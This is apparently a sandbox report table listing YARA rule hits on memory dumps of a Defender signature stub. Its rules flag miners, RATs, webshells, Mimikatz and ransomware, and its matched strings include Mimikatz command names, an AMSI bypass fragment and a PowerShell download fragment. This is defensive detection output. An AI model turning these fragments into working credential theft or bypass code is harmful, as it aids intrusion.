36.3.MpSigStub.exe.197a32a3acd.179.raw.unpack	XOR_4byte_Key	Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan)	Florian Roth	0x363e7:$s1: 85 C9 74 0A 31 06 01 1E 83 C6 04 49 EB F2
36.3.MpSigStub.exe.197a477ec45.51.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
36.3.MpSigStub.exe.197a364dcf9.182.raw.unpack	Tofu_Backdoor	Detects Tofu Trojan	Cylance	0x28b6:$a: Cookies: Sym1.0 0x2857:$c: 66 0F FC C1 0F 11 40 D0 0F 10 40 D0 66 0F EF C2 0F 11 40 D0 0F 10 40 E0
36.3.MpSigStub.exe.197a2f5336d.108.raw.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
36.3.MpSigStub.exe.197a44b5166.45.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xb2eb:$s1: http:// 0xb302:$s1: http:// 0xb31a:$s1: http:// 0xb88f:$s1: http:// 0xee24:$s1: lppt>++ 0xee18:$s2: lpptw>++ 0xb2eb:$f1: http:// 0xb302:$f1: http:// 0xb31a:$f1: http:// 0xb88f:$f1: http://
36.3.MpSigStub.exe.197a44b5166.45.raw.unpack	IMPLANT_4_v5	BlackEnergy / Voodoo Bear Implant by APT28	US CERT	0xe7bf:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1
36.3.MpSigStub.exe.197a44b5166.45.raw.unpack	Derusbi_Kernel_Driver_WD_UDFS	Detects Derusbi Kernel Driver	Florian Roth	0xb4e2:$x3: \??\pipe\usbpcex%d 0xb530:$x4: \??\pipe\usbpcg%d
36.3.MpSigStub.exe.197a44b5166.45.raw.unpack	SUSP_XORed_Mozilla	Detects suspicious XORed keyword - Mozilla/5.0	Florian Roth	0xee2f:$xo1: Ik~mhhe+1*4
36.3.MpSigStub.exe.197a4fb9462.85.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0x30d57:$x1: ReflectiveLoader
36.3.MpSigStub.exe.197a4fb9462.85.raw.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0x2f4ff:$: DECRYPT_YOUR_FILES
36.3.MpSigStub.exe.197a4fb9462.85.raw.unpack	APT_PupyRAT_PY	Detects Pupy RAT	Florian Roth	0x30d0f:$x1: reflective_inject_dll 0x30dc6:$x1: reflective_inject_dll
36.3.MpSigStub.exe.197a4fb9462.85.raw.unpack	Pupy_Backdoor	Detects Pupy backdoor	Florian Roth	0x30d29:$x1: reflectively inject a dll into a process. 0x30d0f:$x4: reflective_inject_dll 0x30dc6:$x4: reflective_inject_dll 0x30d0f:$x8: reflective_inject_dll 0x30dc6:$x8: reflective_inject_dll 0x30dc6:$x9: reflective_inject_dll(pid, dll_buffer, isRemoteProcess64bits)
36.3.MpSigStub.exe.197a4fb9462.85.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x1d38f:$s1: stratum+tcp://
36.3.MpSigStub.exe.197a4fb9462.85.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
36.3.MpSigStub.exe.197a4301256.84.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
36.3.MpSigStub.exe.197a4a13be1.209.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x594d:$s1: stratum+tcp://
36.3.MpSigStub.exe.197a4a13be1.209.raw.unpack	JoeSecurity_bitcoinminer	Yara detected BitCoin Miner	Joe Security
36.3.MpSigStub.exe.197a3f2fc42.62.raw.unpack	Mimikatz_Memory_Rule_1	Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures)	Florian Roth	0x28646:$s1: sekurlsa::msv 0x286c8:$s7: sekurlsa::ssp 0x28687:$s11: sekurlsa::pth
36.3.MpSigStub.exe.197a4301256.170.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
36.3.MpSigStub.exe.197a3f032fe.94.unpack	webshell_asp_generic_eval_on_input	Generic ASP webshell which uses any eval/exec function directly on user input	Arnim Rupp	0x804b:$payload_and_input1: eval(request. 0x802b:$tagasp_short1: <%@ 0x8049:$tagasp_short1: <%e 0xeb7b:$tagasp_short1: <%\xC4 0x8049:$tagasp_long13: <%ev
36.3.MpSigStub.exe.197a32ee0f6.17.raw.unpack	Molerats_Jul17_Sample_5	Detects Molerats sample - July 2017	Florian Roth	0x2b2de:$a1: net.webclient).downloadstring 0x2bccf:$a1: net.webclient).downloadstring 0x2ca3c:$a1: net.webclient).downloadstring 0x2b305:$a2: gist.githubusercontent.com
36.3.MpSigStub.exe.197a32ee0f6.17.raw.unpack	Hacktool_Strings_p0wnedShell	p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs	Florian Roth	0x7628:$x3: lsadump::dcsync
36.3.MpSigStub.exe.197a32ee0f6.17.raw.unpack	Suspicious_PowerShell_WebDownload_1	Detects suspicious PowerShell code that downloads from web sites	Florian Roth	0x2b2d7:$s2: system.net.webclient).downloadstring('http
36.3.MpSigStub.exe.197a32ee0f6.17.raw.unpack	Mimikatz_Memory_Rule_1	Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures)	Florian Roth	0x76f1:$s5: sekurlsa::tspkg 0x76ae:$s13: sekurlsa::ekeys 0x766b:$s14: sekurlsa::dpapi
36.3.MpSigStub.exe.197a4764291.52.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
36.3.MpSigStub.exe.197a3929e2b.210.unpack	REDLEAVES_CoreImplant_UniqueStrings	Strings identifying the core REDLEAVES RAT in its deobfuscated state	USG	0x18f6:$unique4: red_autumnal_leaves_dllmain.dll
36.3.MpSigStub.exe.197a4c04b1a.11.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x1da8d:$s1: stratum+tcp:// 0x1fd7d:$s1: stratum+tcp://
36.3.MpSigStub.exe.197a4c04b1a.11.raw.unpack	PUA_CryptoMiner_Jan19_1	Detects Crypto Miner strings	Florian Roth	0x203ba:$s1: Stratum notify: invalid Merkle branch
36.3.MpSigStub.exe.197a4c04b1a.11.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
36.3.MpSigStub.exe.197a36f3b2a.193.unpack	MAL_Turla_Agent_BTZ	Detects Turla Agent.BTZ	Florian Roth	0x661b:$x5: mfc42l00.pdb 0x65e8:$s3: %s\system32
36.3.MpSigStub.exe.197a36f3b2a.193.unpack	dump_tool	unknown	@patrickrolsen	0x4f2d:$s4: fgdump 0x4f37:$s5: fgexec 0x4f37:$s6: fgexecpipe
36.3.MpSigStub.exe.197a36f3b2a.193.raw.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
36.3.MpSigStub.exe.197a36f3b2a.193.raw.unpack	dump_tool	unknown	@patrickrolsen	0x5b2d:$s4: fgdump 0x5b37:$s5: fgexec 0x5b37:$s6: fgexecpipe
36.3.MpSigStub.exe.197a3f032fe.94.raw.unpack	webshell_asp_generic_eval_on_input	Generic ASP webshell which uses any eval/exec function directly on user input	Arnim Rupp	0x904b:$payload_and_input1: eval(request. 0x902b:$tagasp_short1: <%@ 0x9049:$tagasp_short1: <%e 0xfb7b:$tagasp_short1: <%\xC4 0x187e8:$tagasp_short1: <%\x1D 0x145b8:$tagasp_short2: %> 0x9049:$tagasp_long13: <%ev
36.3.MpSigStub.exe.197a48adbfa.121.raw.unpack	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x24b8:$payload7: eval(base64_decode( 0x24b3:$php_short: <? 0x3db0:$php_short: <? 0x4e8f:$php_short: <? 0x1002d:$php_short: <? 0x3db0:$php_new1: <?=$ 0x24b3:$php_new2: <?php 0x4e8f:$php_new2: <?php
36.3.MpSigStub.exe.197a48adbfa.121.raw.unpack	webshell_php_by_string_obfuscation	PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming	Arnim Rupp	0x5220:$opbs73: eval(str_rot13( 0x24b3:$php_short: <? 0x3db0:$php_short: <? 0x4e8f:$php_short: <? 0x1002d:$php_short: <? 0x3db0:$php_new1: <?=$ 0x24b3:$php_new2: <?php 0x4e8f:$php_new2: <?php
36.3.MpSigStub.exe.197a48adbfa.121.raw.unpack	webshell_asp_generic_eval_on_input	Generic ASP webshell which uses any eval/exec function directly on user input	Arnim Rupp	0x198f3:$payload_and_input1: eval(request. 0x3594:$tagasp_short1: <%@ 0x198d6:$tagasp_short1: <%@ 0x198f1:$tagasp_short1: <%e 0x35bc:$tagasp_short2: %> 0xdabf:$tagasp_short2: %> 0x198ef:$tagasp_short2: %> 0x19915:$tagasp_short2: %> 0x198f1:$tagasp_long13: <%ev 0x198d6:$tagasp_long20: <%@pagelanguage="jscript 0x175fa:$jsp4: public
36.3.MpSigStub.exe.197a48adbfa.121.raw.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
36.3.MpSigStub.exe.197a4fa8d92.185.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xa7b:$s1: \@@D\x0E\x1B\x1B
36.3.MpSigStub.exe.197a36f3b2a.215.raw.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
36.3.MpSigStub.exe.197a36f3b2a.215.raw.unpack	dump_tool	unknown	@patrickrolsen	0x5b2d:$s4: fgdump 0x5b37:$s5: fgexec 0x5b37:$s6: fgexecpipe
36.3.MpSigStub.exe.197a359a55a.157.raw.unpack	SUSP_Microsoft_7z_SFX_Combo	Detects a suspicious file that has a Microsoft copyright and is a 7z SFX	Florian Roth	0x16348:$s1: 7ZSfx%03x.cmd 0x8b5:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0x1461:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0x2051:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0x2c61:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ...
36.3.MpSigStub.exe.197a32a53a1.178.raw.unpack	XOR_4byte_Key	Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan)	Florian Roth	0x34b13:$s1: 85 C9 74 0A 31 06 01 1E 83 C6 04 49 EB F2
36.3.MpSigStub.exe.197a32eccf2.19.raw.unpack	Molerats_Jul17_Sample_5	Detects Molerats sample - July 2017	Florian Roth	0x2c6e2:$a1: net.webclient).downloadstring 0x2d0d3:$a1: net.webclient).downloadstring 0x2de40:$a1: net.webclient).downloadstring 0x2c709:$a2: gist.githubusercontent.com
36.3.MpSigStub.exe.197a32eccf2.19.raw.unpack	Hacktool_Strings_p0wnedShell	p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs	Florian Roth	0x8a2c:$x3: lsadump::dcsync
36.3.MpSigStub.exe.197a32eccf2.19.raw.unpack	Suspicious_PowerShell_WebDownload_1	Detects suspicious PowerShell code that downloads from web sites	Florian Roth	0x2c6db:$s2: system.net.webclient).downloadstring('http
36.3.MpSigStub.exe.197a32eccf2.19.raw.unpack	Mimikatz_Memory_Rule_1	Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures)	Florian Roth	0x8af5:$s5: sekurlsa::tspkg 0x8ab2:$s13: sekurlsa::ekeys 0x8a6f:$s14: sekurlsa::dpapi
36.3.MpSigStub.exe.197a36f3b2a.148.raw.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
36.3.MpSigStub.exe.197a36f3b2a.148.raw.unpack	dump_tool	unknown	@patrickrolsen	0x5b2d:$s4: fgdump 0x5b37:$s5: fgexec 0x5b37:$s6: fgexecpipe
36.3.MpSigStub.exe.197a3f84db6.63.unpack	hacktool_macos_keylogger_logkext	LogKext is an open source keylogger for Mac OS X, a product of FSB software.	@mimeframe	0x1ff49:$a1: logKextPassKey 0xb31f0:$a1: logKextPassKey 0x1e0ec:$a4: com_fsb_iokit_logKext 0x1ff6c:$a4: com_fsb_iokit_logKext 0x79480:$a4: com_fsb_iokit_logKext 0xb321e:$b1: logKext Password: 0xb3233:$b2: Logging controls whether the daemon is logging keystrokes (default is on). 0x1ff49:$c1: logKextPassKey 0xb31f0:$c1: logKextPassKey
36.3.MpSigStub.exe.197a3f84db6.63.unpack	Mimikatz_Strings	Detects Mimikatz strings	Florian Roth	0xc6971:$x11: \\.\mimidrv
36.3.MpSigStub.exe.197a3f84db6.63.unpack	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x54d97:$sa1: -ENC 0xfd2cf:$sc2: -noprofile 0xfd2e1:$sd2: -noninteractive 0x53819:$se1: -EP bypass 0x54d7f:$se3: -ExecutionPolicy BypasS
36.3.MpSigStub.exe.197a3f84db6.63.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
36.3.MpSigStub.exe.197a3f84db6.63.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
36.3.MpSigStub.exe.197a3515a01.88.raw.unpack	SUSP_PDB_Path_Keywords	Detects suspicious PDB paths	Florian Roth	0xdd41:$: ShellCode.pdb
36.3.MpSigStub.exe.197a4644266.106.raw.unpack	APT_DNSpionage_Karkoff_Malware_Apr19_1	Detects DNSpionage Karkoff malware	Florian Roth	0x8b96:$x3: rimrun.com
36.3.MpSigStub.exe.197a4644266.106.raw.unpack	DeepPanda_htran_exe	Hack Deep Panda - htran-exe	Florian Roth	0x9512:$s15: [+] OK! I Closed The Two Socket.
36.3.MpSigStub.exe.197a4644266.106.raw.unpack	SUSP_DropperBackdoor_Keywords	Detects suspicious keywords that indicate a backdoor	Florian Roth	0x8b75:$x4: DropperBackdoor
36.3.MpSigStub.exe.197a4644266.106.raw.unpack	APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_3	Detects HOPLIGHT malware used by HiddenCobra APT group	Florian Roth	0xb3a1:$s5: emailAddress= 0xb391:$s7: www.naver.com 0xb360:$x2: reykfgkodfgkfdskgdfogpdokgsdfpg 0xb342:$x3: fjiejffndxklfsdkfjsaadiepwn
36.3.MpSigStub.exe.197a4644266.106.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
36.3.MpSigStub.exe.197a3ff325f.122.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0xa8c9:$s1: stratum+tcp:// 0xb35d:$s1: stratum+tcp:// 0xc709:$s1: stratum+tcp:// 0xca31:$s1: stratum+tcp://
36.3.MpSigStub.exe.197a3ff325f.122.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
36.3.MpSigStub.exe.197a3ff325f.122.raw.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
36.3.MpSigStub.exe.197a4245a35.92.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xf83e:$x1: ReflectiveLoader
36.3.MpSigStub.exe.197a4245a35.92.raw.unpack	HackTool_Samples	Hacktool	unknown	0x2316d:$c: Failed to load SAM functions
36.3.MpSigStub.exe.197a4245a35.92.raw.unpack	PS_AMSI_Bypass	Detects PowerShell AMSI Bypass	Florian Roth	0xd743:$s1: .getfield('amsicontext',[reflection.bindingflags]'nonpublic,static').
36.3.MpSigStub.exe.197a4245a35.92.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
36.3.MpSigStub.exe.197a4fa658a.183.raw.unpack	APT_MAL_Sandworm_Exaramel_Configuration_Key	Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...	FR/ANSSI/SDO	0x7322:$: odhyrfjcnfkdtslt
36.3.MpSigStub.exe.197a4fa658a.183.raw.unpack	APT_APT29_sorefang_modify_alphabet_custom_encode	Rule to detect SoreFang based on arguments passed into custom encoding algorithm function	NCSC	0x6d4a:$: 33 C0 8B CE 6A 36 6A 71 66 89 46 60 88 46 62 89 46 68 66 89 46 64
36.3.MpSigStub.exe.197a407e899.124.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x10bff:$s1: stratum+tcp:// 0x1181b:$s1: stratum+tcp://
36.3.MpSigStub.exe.197a407e899.124.raw.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x1e947:$e3: exe.rerolpxe
36.3.MpSigStub.exe.197a407e899.124.raw.unpack	JoeSecurity_Conti_ransomware	Yara detected Conti ransomware	Joe Security
36.3.MpSigStub.exe.197a4fa8d92.116.raw.unpack	APT_MAL_Sandworm_Exaramel_Configuration_Key	Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...	FR/ANSSI/SDO	0x4b1a:$: odhyrfjcnfkdtslt
36.3.MpSigStub.exe.197a4fa8d92.116.raw.unpack	APT_APT29_sorefang_modify_alphabet_custom_encode	Rule to detect SoreFang based on arguments passed into custom encoding algorithm function	NCSC	0x4542:$: 33 C0 8B CE 6A 36 6A 71 66 89 46 60 88 46 62 89 46 68 66 89 46 64
36.3.MpSigStub.exe.197a4a13be1.57.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x594d:$s1: stratum+tcp://
36.3.MpSigStub.exe.197a4a13be1.57.raw.unpack	JoeSecurity_bitcoinminer	Yara detected BitCoin Miner	Joe Security
36.3.MpSigStub.exe.197a407d495.123.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x12003:$s1: stratum+tcp:// 0x12c1f:$s1: stratum+tcp://
36.3.MpSigStub.exe.197a407d495.123.raw.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x1fd4b:$e3: exe.rerolpxe
36.3.MpSigStub.exe.197a407d495.123.raw.unpack	JoeSecurity_Conti_ransomware	Yara detected Conti ransomware	Joe Security
36.3.MpSigStub.exe.197a4df1a99.144.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0x302b:$x1: ReflectiveLoader
36.3.MpSigStub.exe.197a4777703.50.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
36.3.MpSigStub.exe.197a3f84db6.208.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x16a3d:$s1: stratum+tcp://
36.3.MpSigStub.exe.197a3f84db6.208.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
36.3.MpSigStub.exe.197a4dc49fa.186.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x11722:$s1: stratum+tcp://
36.3.MpSigStub.exe.197a4dc49fa.186.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
36.3.MpSigStub.exe.197a4dc49fa.186.raw.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
36.3.MpSigStub.exe.197a47aa096.59.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x7148:$s1: http:// 0x7285:$s1: http:// 0x72a0:$s1: http:// 0x72bf:$s1: http:// 0x72d9:$s1: http:// 0x72f7:$s1: http:// 0x7313:$s1: http:// 0x7a4e:$s1: http:// 0x7a6a:$s1: http:// 0x7a92:$s1: http:// 0x7aba:$s1: http:// 0x7af2:$s1: http:// 0x7b7d:$s1: http:// 0x1f643:$s1: http:// 0x21666:$s1: http:// 0x25853:$s1: http:// 0x2771b:$s1: http:// 0x295f2:$s1: )551{nn 0x2960a:$s1: http:// 0x34204:$s1: http:// 0x3533c:$s1: http://
36.3.MpSigStub.exe.197a47aa096.59.raw.unpack	APT_Backdoor_Win_GoRat_Memory	Identifies GoRat malware in memory based on strings.	FireEye	0x24bb0:$rat1: rat/modules/socks.(HTTPProxyClient).beacon 0x24a8d:$rat2: rat.(Core).generateBeacon 0x24aaa:$rat3: rat.gJitter 0x24ab8:$rat4: rat/comms.(protectedChannel).SendCmdResponse 0x24b1e:$rat6: rat/modules/latlisten.(latlistensrv).handleCmd 0x24b86:$rat8: rat/modules/netsweeper.(Pinger).listen 0x24bb0:$rat9: rat/modules/socks.(HTTPProxyClient).beacon 0x24bde:$rat10: rat/platforms/win/dyloader.(memoryLoader).ExecutePluginFunction 0x24a64:$winblows: rat/platforms/win.(winblows).GetStage
36.3.MpSigStub.exe.197a497a30f.132.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xcc24:$x1: ReflectiveLoader
36.3.MpSigStub.exe.197a497a30f.132.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0xe32e:$s1: stratum+tcp://
36.3.MpSigStub.exe.197a497a30f.132.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
36.3.MpSigStub.exe.197a42450e1.91.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0x10192:$x1: ReflectiveLoader
36.3.MpSigStub.exe.197a42450e1.91.raw.unpack	HackTool_Samples	Hacktool	unknown	0x23ac1:$c: Failed to load SAM functions
36.3.MpSigStub.exe.197a42450e1.91.raw.unpack	PS_AMSI_Bypass	Detects PowerShell AMSI Bypass	Florian Roth	0xe097:$s1: .getfield('amsicontext',[reflection.bindingflags]'nonpublic,static').
36.3.MpSigStub.exe.197a42450e1.91.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
36.3.MpSigStub.exe.197a433f6c2.83.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x5ba89:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x5bc99:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
36.3.MpSigStub.exe.197a433f6c2.83.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x5ba89:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x5bc99:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x2f9d7:$s6: avp.exe 0x56a8d:$s6: avp.exe 0x5ba89:$c1: Elevation:Administrator!new: 0x5bc99:$c1: Elevation:Administrator!new: 0x5ba30:$c6: ConsentPromptBehaviorAdmin 0x5bc40:$c6: ConsentPromptBehaviorAdmin
36.3.MpSigStub.exe.197a433f6c2.83.unpack	GhostDragon_Gh0stRAT	Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report	Florian Roth	0xd85b:$x4: Http/1.1 403 Forbidden 0x41c0c:$x4: Http/1.1 403 Forbidden 0xd85b:$s5: Http/1.1 403 Forbidden 0x41c0c:$s5: Http/1.1 403 Forbidden
36.3.MpSigStub.exe.197a433f6c2.83.unpack	GoldDragon_Aux_File	Detects export from Gold Dragon - February 2018	Florian Roth	0x2b96a:$x1: /////////////////////regkeyenum////////////
36.3.MpSigStub.exe.197a433f6c2.83.unpack	GoldDragon_RunnignRAT	Detects Running RAT malware from Gold Dragon report	Florian Roth	0x2c4bd:$s3: taskkill /f /im daumcleaner.exe 0x2c5eb:$s5: rundll32.exe "%s" Run 0x2c6e9:$s6: Mozilla/5.0 (Windows NT 5.2; rv:12.0) Gecko/20100101 Firefox/12.0
36.3.MpSigStub.exe.197a433f6c2.83.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0xe023:$s1: stratum+tcp://
36.3.MpSigStub.exe.197a433f6c2.83.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
36.3.MpSigStub.exe.197a433f6c2.83.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
36.3.MpSigStub.exe.197a433f6c2.83.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
36.3.MpSigStub.exe.197a433f6c2.83.unpack	pdb_strings_Rescator	Rescator PDB strings within binaries	@patrickrolsen	0x25700:$pdb1: \Projects\Rescator
36.3.MpSigStub.exe.197a4c03116.10.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x1f491:$s1: stratum+tcp:// 0x21781:$s1: stratum+tcp://
36.3.MpSigStub.exe.197a4c03116.10.raw.unpack	PUA_CryptoMiner_Jan19_1	Detects Crypto Miner strings	Florian Roth	0x21dbe:$s1: Stratum notify: invalid Merkle branch
36.3.MpSigStub.exe.197a4c03116.10.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
36.3.MpSigStub.exe.197a46f017a.58.raw.unpack	MiniRAT_Gen_1	Detects Mini RAT malware	Florian Roth	0x29579:$x1: \Mini rat\
36.3.MpSigStub.exe.197a46f017a.58.raw.unpack	SUSP_PDB_Strings_Keylogger_Backdoor	Detects PDB strings used in backdoors or keyloggers	Florian Roth	0x287fc:$: \Debug\KeyLogger
36.3.MpSigStub.exe.197a36a8ae6.146.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
36.3.MpSigStub.exe.197a4fa8d92.116.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xa7b:$s1: \@@D\x0E\x1B\x1B
36.3.MpSigStub.exe.197a4f45162.112.raw.unpack	APT_DeputyDog_Fexel	unknown	ThreatConnect Intelligence Research Team	0xe916:$cUp: Upload failed! [Remote error code:
36.3.MpSigStub.exe.197a407fe9d.110.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0xf5fb:$s1: stratum+tcp:// 0x10217:$s1: stratum+tcp://
36.3.MpSigStub.exe.197a407fe9d.110.raw.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x1d343:$e3: exe.rerolpxe
36.3.MpSigStub.exe.197a407fe9d.110.raw.unpack	JoeSecurity_Conti_ransomware	Yara detected Conti ransomware	Joe Security
36.3.MpSigStub.exe.197a407e899.111.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x10bff:$s1: stratum+tcp:// 0x1181b:$s1: stratum+tcp://
36.3.MpSigStub.exe.197a407e899.111.raw.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x1e947:$e3: exe.rerolpxe
36.3.MpSigStub.exe.197a407e899.111.raw.unpack	JoeSecurity_Conti_ransomware	Yara detected Conti ransomware	Joe Security
36.3.MpSigStub.exe.197a3f84db6.95.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x16a3d:$s1: stratum+tcp://
36.3.MpSigStub.exe.197a3f84db6.95.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
36.3.MpSigStub.exe.197a33b6aa2.66.raw.unpack	Unspecified_Malware_Sep1_A1	Detects malware from DrqgonFly APT report	Florian Roth
36.3.MpSigStub.exe.197a36f3b2a.215.unpack	MAL_Turla_Agent_BTZ	Detects Turla Agent.BTZ	Florian Roth	0x661b:$x5: mfc42l00.pdb 0x65e8:$s3: %s\system32
36.3.MpSigStub.exe.197a36f3b2a.215.unpack	dump_tool	unknown	@patrickrolsen	0x4f2d:$s4: fgdump 0x4f37:$s5: fgexec 0x4f37:$s6: fgexecpipe
36.3.MpSigStub.exe.197a327ab6a.200.raw.unpack	Oilrig_IntelSecurityManager	Detects OilRig malware	Eyal Sela	0x55b1:$one3: srvCheckresponded
36.3.MpSigStub.exe.197a327ab6a.200.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x7edf:$s1: stratum+tcp://
36.3.MpSigStub.exe.197a327ab6a.200.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
36.3.MpSigStub.exe.197a327ab6a.200.raw.unpack	JoeSecurity_Winexe_tool	Yara detected Winexe tool	Joe Security
36.3.MpSigStub.exe.197a327ab6a.200.raw.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
36.3.MpSigStub.exe.197a32a2a79.180.raw.unpack	XOR_4byte_Key	Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan)	Florian Roth	0x3743b:$s1: 85 C9 74 0A 31 06 01 1E 83 C6 04 49 EB F2
